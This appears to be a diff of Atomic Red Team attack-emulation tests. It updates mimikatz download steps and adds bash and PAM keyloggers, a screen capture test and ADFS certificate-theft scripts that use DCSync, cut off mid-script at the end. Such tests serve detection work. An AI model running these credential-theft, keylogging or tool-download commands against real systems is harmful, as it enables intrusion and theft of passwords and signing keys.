+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1055/T1055.yaml

@@ -63,7 +63,8 @@ atomic_tests:
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1056.001/T1056.001.md

@@ -16,6 +16,14 @@ Keylogging is the most prevalent type of input capture, with many different ways
 
 - [Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d](#atomic-test-2---living-off-the-land-terminal-input-capture-on-linux-with-pamd)
 
+- [Atomic Test #3 - Logging bash history to syslog](#atomic-test-3---logging-bash-history-to-syslog)
+
+- [Atomic Test #4 - Bash session based keylogger](#atomic-test-4---bash-session-based-keylogger)
+
+- [Atomic Test #5 - SSHD PAM keylogger](#atomic-test-5---sshd-pam-keylogger)
+
+- [Atomic Test #6 - Auditd keylogger](#atomic-test-6---auditd-keylogger)
+
 
 <br/>
 
@@ -107,4 +115,217 @@ echo "Sorry, you must install module pam_tty_audit.so and recompile, for this te
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #3 - Logging bash history to syslog
+There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
+
+To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+tail /var/log/syslog
+```
+
+#### Cleanup Commands:
+```sh
+unset PROMPT_COMMAND
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: This test requires to be run in a bash shell and that logger and tee are installed.
+##### Check Prereq Commands:
+```sh
+if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Bash session based keylogger
+When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. 
+
+To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | File to store captured commands | String | /tmp/.keyboard.log|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+echo "Hello World!"
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```cmd
+rm #{output_file}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: This test requires to be run in a bash shell
+##### Check Prereq Commands:
+```sh
+if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - SSHD PAM keylogger
+Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| user_account | Basic ssh user account for testing. | string | ubuntu|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+cp -v /etc/pam.d/sshd /tmp/
+echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"
+systemctl restart sshd
+systemctl restart auditd
+ssh #{user_account}@localhost 
+whoami
+sudo su
+whoami
+exit
+exit
+```
+
+#### Cleanup Commands:
+```cmd
+cp -fv /tmp/sshd /etc/pam.d/
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: This test requires sshd and auditd
+##### Check Prereq Commands:
+```sh
+if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Auditd keylogger
+The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** a668edb9-334e-48eb-8c2e-5413a40867af
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | description | type | default|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
+auditctl -a always,exit -F arch=b32 -S execve -k CMDS
+whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S")
+```
+
+#### Cleanup Commands:
+```cmd
+systemctl restart auditd
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: This test requires sshd and auditd
+##### Check Prereq Commands:
+```sh
+if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+```
+##### Get Prereq Commands:
+```sh
+echo ""
+```
+
+
+
+
 <br/>

atomics/T1056.001/T1056.001.yaml

@@ -54,3 +54,125 @@ atomic_tests:
       sudo cp -f /tmp/system-auth.bk /etc/pam.d/system-auth
     name: sh
     elevation_required: true
+- name: Logging bash history to syslog
+  auto_generated_guid: 0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+  description: |
+    There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable "if set" will be executed before the PS1 variable and can be configured to write the latest "bash history" entries to the syslog.
+
+    To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ 
+  supported_platforms:
+    - linux
+  dependency_executor_name: sh 
+  dependencies: 
+    - description: |
+        This test requires to be run in a bash shell and that logger and tee are installed.
+      prereq_command: | 
+        if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+        if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
+        if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
+      get_prereq_command: | 
+        echo ""
+  executor:
+    name: sh
+    elevation_required: true
+    command: | 
+      PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t "$USER[$$] $SSH_CONNECTION ")'
+      echo "\$PROMPT_COMMAND=$PROMPT_COMMAND"
+      tail /var/log/syslog
+    cleanup_command: | 
+      unset PROMPT_COMMAND
+- name: Bash session based keylogger
+  auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
+  description: |
+    When a command is executed in bash, the BASH_COMMAND variable contains that command. For example :~$ echo $BASH_COMMAND = "echo $BASH_COMMAND". The trap command is not a external command, but a built-in function of bash and can be used in a script to run a bash function when some event occurs. trap will detect when the BASH_COMMAND variable value changes and then pipe that value into a file, creating a bash session based keylogger. 
+
+    To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/ 
+  supported_platforms:
+    - linux
+  dependency_executor_name: sh 
+  dependencies: 
+    - description: |
+        This test requires to be run in a bash shell
+      prereq_command: | 
+        if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
+      get_prereq_command: | 
+        echo ""
+  input_arguments:
+    output_file:
+      name: output_file
+      description: File to store captured commands
+      type: String
+      default: /tmp/.keyboard.log
+  executor:
+    name: command_prompt
+    elevation_required: false 
+    command: | 
+      trap 'echo "$(date +"%d/%m/%y %H:%M:%S.%s") $USER $BASH_COMMAND" >> #{output_file}' DEBUG
+      echo "Hello World!"
+      cat #{output_file}
+    cleanup_command: | 
+      rm #{output_file}
+- name: SSHD PAM keylogger
+  auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
+  description: |
+    Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. The Linux audit tool auditd can use the pam_tty_audit module to enable auditing of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes.
+  supported_platforms:
+    - linux
+  dependency_executor_name: sh 
+  dependencies: 
+    - description: |
+        This test requires sshd and auditd
+      prereq_command: | 
+        if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
+        if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+      get_prereq_command: | 
+        echo ""
+  input_arguments:
+    user_account:
+      description: Basic ssh user account for testing.
+      type: string
+      default: ubuntu
+  executor:
+    name: command_prompt
+    elevation_required: true 
+    command: | 
+      cp -v /etc/pam.d/sshd /tmp/
+      echo >> "session required pam_tty_audit.so disable=* enable=* open_only log_passwd"
+      systemctl restart sshd
+      systemctl restart auditd
+      ssh #{user_account}@localhost 
+      whoami
+      sudo su
+      whoami
+      exit
+      exit
+    cleanup_command: | 
+      cp -fv /tmp/sshd /etc/pam.d/
+- name: Auditd keylogger
+  auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
+  description: |
+    The linux audit tool auditd can be used to capture 32 and 64 bit command execution and place the command in the /var/log/audit/audit.log audit log. 
+  supported_platforms:
+    - linux
+  dependency_executor_name: sh 
+  dependencies: 
+    - description: |
+        This test requires sshd and auditd
+      prereq_command: | 
+        if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
+      get_prereq_command: | 
+        echo ""
+  input_arguments:
+    output_file:
+      description: description
+      type: type
+      default: default
+  executor:
+    name: command_prompt
+    elevation_required: true 
+    command: | 
+      auditctl -a always,exit -F arch=b64 -S execve -k CMDS 
+      auditctl -a always,exit -F arch=b32 -S execve -k CMDS
+      whoami; ausearch -i --start $(date +"%d/%m/%y %H:%M:%S") 
+    cleanup_command: | 
+      systemctl restart auditd

atomics/T1113/T1113.md

@@ -15,6 +15,8 @@
 
 - [Atomic Test #5 - Windows Screencapture](#atomic-test-5---windows-screencapture)
 
+- [Atomic Test #6 - Windows Screen Capture (CopyFromScreen)](#atomic-test-6---windows-screen-capture-copyfromscreen)
+
 
 <br/>
 
@@ -231,4 +233,48 @@ rm #{output_file} -ErrorAction Ignore
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Windows Screen Capture (CopyFromScreen)
+Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
+
+[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e9313014-985a-48ef-80d9-cde604ffc187
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | $env:TEMP&#92;T1113.png|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Add-Type -AssemblyName System.Windows.Forms
+$screen = [Windows.Forms.SystemInformation]::VirtualScreen
+$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
+$graphic = [Drawing.Graphics]::FromImage($bitmap)
+$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
+$bitmap.Save("#{output_file}")
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{output_file} -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

atomics/T1113/T1113.yaml

@@ -118,3 +118,27 @@ atomic_tests:
       cmd /c "timeout #{recording_time} > NULL && psr.exe /stop"
     cleanup_command: |
       rm #{output_file} -ErrorAction Ignore
+- name: Windows Screen Capture (CopyFromScreen)
+  auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
+  description: |
+    Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
+
+    [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
+  supported_platforms:
+  - windows
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed
+      type: Path
+      default: $env:TEMP\T1113.png
+  executor:
+    command: |
+      Add-Type -AssemblyName System.Windows.Forms
+      $screen = [Windows.Forms.SystemInformation]::VirtualScreen
+      $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
+      $graphic = [Drawing.Graphics]::FromImage($bitmap)
+      $graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
+      $bitmap.Save("#{output_file}")
+    cleanup_command: |
+      Remove-Item #{output_file} -ErrorAction Ignore
+    name: powershell

atomics/T1207/T1207.md

@@ -88,7 +88,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1207/T1207.yaml

@@ -46,7 +46,8 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1550.002/T1550.002.md

@@ -57,7 +57,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1550.002/T1550.002.yaml

@@ -34,7 +34,8 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1550.003/T1550.003.md

@@ -56,7 +56,8 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force

atomics/T1550.003/T1550.003.yaml

@@ -28,7 +28,8 @@ atomic_tests:
       if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
       Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
       New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
       Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force

atomics/T1552.004/T1552.004.md

@@ -20,6 +20,10 @@ Some private keys require a password or passphrase for operation, so an adversar
 
 - [Atomic Test #5 - Copy the users GnuPG directory with rsync](#atomic-test-5---copy-the-users-gnupg-directory-with-rsync)
 
+- [Atomic Test #6 - ADFS token signing and encryption certificates theft - Local](#atomic-test-6---adfs-token-signing-and-encryption-certificates-theft---local)
+
+- [Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote](#atomic-test-7---adfs-token-signing-and-encryption-certificates-theft---remote)
+
 
 <br/>
 
@@ -204,4 +208,137 @@ rm -rf #{output_folder}
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - ADFS token signing and encryption certificates theft - Local
+Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
+Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 78e95057-d429-4e66-8f82-0f060c1ac96f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module AADInternals -Force
+Export-AADIntADFSCertificates
+Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+Write-Host "`nCertificates retrieved successfully"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path ".\ADFS_encryption.pfx"
+Remove-Item -Path ".\ADFS_signing.pfx"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AADInternals module must be installed.
+##### Check Prereq Commands:
+```powershell
+if (Get-Module AADInternals) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AADInternals -Force
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - ADFS token signing and encryption certificates theft - Remote
+Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
+Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cab413d8-9e4a-4b8d-9b84-c985bd73a442
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| adfs_service_account_name | Name of the ADFS service account | String | adfs_svc|
+| replication_user | Username with replication rights. It can be the Domain Admin running the script | String | Administrator|
+| replication_password | Password of replication_username | String | ReallyStrongPassword|
+| adfs_server_name | Name of an ADFS server | String | sts.contoso.com|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module ActiveDirectory -Force 
+Import-Module AADInternals -Force | Out-Null
+#Get Configuration
+$dcServerName = (Get-ADDomainController).HostName
+$svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
+$PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
+$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
+# use DCSync to fetch the ADFS service account's NT hash
+$hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
+$ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
+# Get certificates decryption key
+$Configuration = [xml]$ADFSConfig
+$group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
+$container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
+$parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
+$base = "LDAP://CN=$group,$container,$parent"
+$ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
+$ADSearch.Filter = '(name=CryptoPolicy)'
+$ADSearch.PropertiesToLoad.Clear()
+$ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
+$aduser = $ADSearch.FindOne()
+$keyObjectGuid = $ADUser.Properties["displayName"] 
+$ADSearch.PropertiesToLoad.Clear()
+$ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
+$ADSearch.Filter="(l=$keyObjectGuid)"
+$aduser=$ADSearch.FindOne() 
+$key=[byte[]]$aduser.Properties["thumbnailphoto"][0] 
+# Get encrypted certificates from configuration and decrypt them
+Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
+Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+Write-Host "`nCertificates retrieved successfully"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path ".\ADFS_encryption.pfx"
+Remove-Item -Path ".\ADFS_signing.pfx"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AADInternals and ActiveDirectory modules must be installed.
+##### Check Prereq Commands:
+```powershell
+if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AADInternals -Force
+```
+
+
+
+
 <br/>

atomics/T1552.004/T1552.004.yaml

@@ -103,3 +103,99 @@ atomic_tests:
     cleanup_command: |
       rm -rf #{output_folder}
     name: sh
+- name: ADFS token signing and encryption certificates theft - Local
+  auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f
+  description: |
+    Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as Administrator on an ADFS server.
+    Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AADInternals module must be installed.
+    prereq_command: |
+      if (Get-Module AADInternals) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module AADInternals -Force
+      Export-AADIntADFSCertificates
+      Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+      Write-Host "`nCertificates retrieved successfully"
+    cleanup_command: |
+      Remove-Item -Path ".\ADFS_encryption.pfx"
+      Remove-Item -Path ".\ADFS_signing.pfx"
+    name: powershell
+- name: ADFS token signing and encryption certificates theft - Remote
+  auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
+  description: |
+    Retrieve ADFS token signing and encrypting certificates. This is a precursor to the Golden SAML attack (T1606.002). You must be signed in as a Domain Administrators user on a domain-joined computer.
+    Based on https://o365blog.com/post/adfs/ and https://github.com/fireeye/ADFSDump.
+  supported_platforms:
+  - windows
+  input_arguments:
+    adfs_service_account_name:
+      description: Name of the ADFS service account
+      type: String
+      default: "adfs_svc"
+    replication_user:
+      description: Username with replication rights. It can be the Domain Admin running the script
+      type: String
+      default: "Administrator"
+    replication_password:
+      description: Password of replication_username
+      type: String
+      default: "ReallyStrongPassword"
+    adfs_server_name:
+      description: Name of an ADFS server
+      type: String
+      default: "sts.contoso.com"
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AADInternals and ActiveDirectory modules must be installed.
+    prereq_command: |
+      if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1}
+    get_prereq_command: |
+      Install-Module -Name AADInternals -Force
+  executor:
+    command: |
+      Import-Module ActiveDirectory -Force 
+      Import-Module AADInternals -Force | Out-Null
+      #Get Configuration
+      $dcServerName = (Get-ADDomainController).HostName
+      $svc = Get-ADObject -filter * -Properties objectguid,objectsid | Where-Object name -eq "#{adfs_service_account_name}"
+      $PWord = ConvertTo-SecureString -String "#{replication_password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList #{replication_user}, $PWord
+      # use DCSync to fetch the ADFS service account's NT hash
+      $hash = Get-AADIntADUserNTHash -ObjectGuid $svc.ObjectGuid -Credentials $Credential -Server $dcServerName -AsHex
+      $ADFSConfig = Export-AADIntADFSConfiguration -Hash $hash -SID $svc.Objectsid.Value -Server #{adfs_server_name}
+      # Get certificates decryption key
+      $Configuration = [xml]$ADFSConfig
+      $group = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.Group
+      $container = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ContainerName
+      $parent = $Configuration.ServiceSettingsData.PolicyStore.DkmSettings.ParentContainerDn
+      $base = "LDAP://CN=$group,$container,$parent"
+      $ADSearch = [System.DirectoryServices.DirectorySearcher]::new([System.DirectoryServices.DirectoryEntry]::new($base))
+      $ADSearch.Filter = '(name=CryptoPolicy)'
